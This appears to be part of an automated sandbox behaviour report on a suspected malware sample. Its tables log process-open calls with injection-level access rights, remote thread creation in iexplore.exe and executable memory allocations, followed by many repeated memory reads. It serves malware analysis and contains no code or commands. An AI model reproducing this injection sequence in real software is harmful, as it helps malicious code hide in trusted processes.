| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
|
For performance reasons, the remaining 448 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | c:\program files\internet explorer\iexplore.exe | proc_address = 0x1a13600, proc_parameter = 0 |
|
1 | |
| Create | c:\program files\internet explorer\iexplore.exe | proc_address = 0x1aa3600, proc_parameter = 0 |
|
1 |
Memory (1006)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | c:\program files\internet explorer\iexplore.exe | address = 27262976, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 79424 |
|
1 | |
| Allocate | c:\program files\internet explorer\iexplore.exe | address = 27852800, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 79424 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147332096, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2822592, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2824600, size = 32 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 2147344384, size = 472 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 594368, size = 656 |
|
1 | |
| Read | c:\program files\internet explorer\iexplore.exe | address = 596410, size = 32 |
|
1 | |
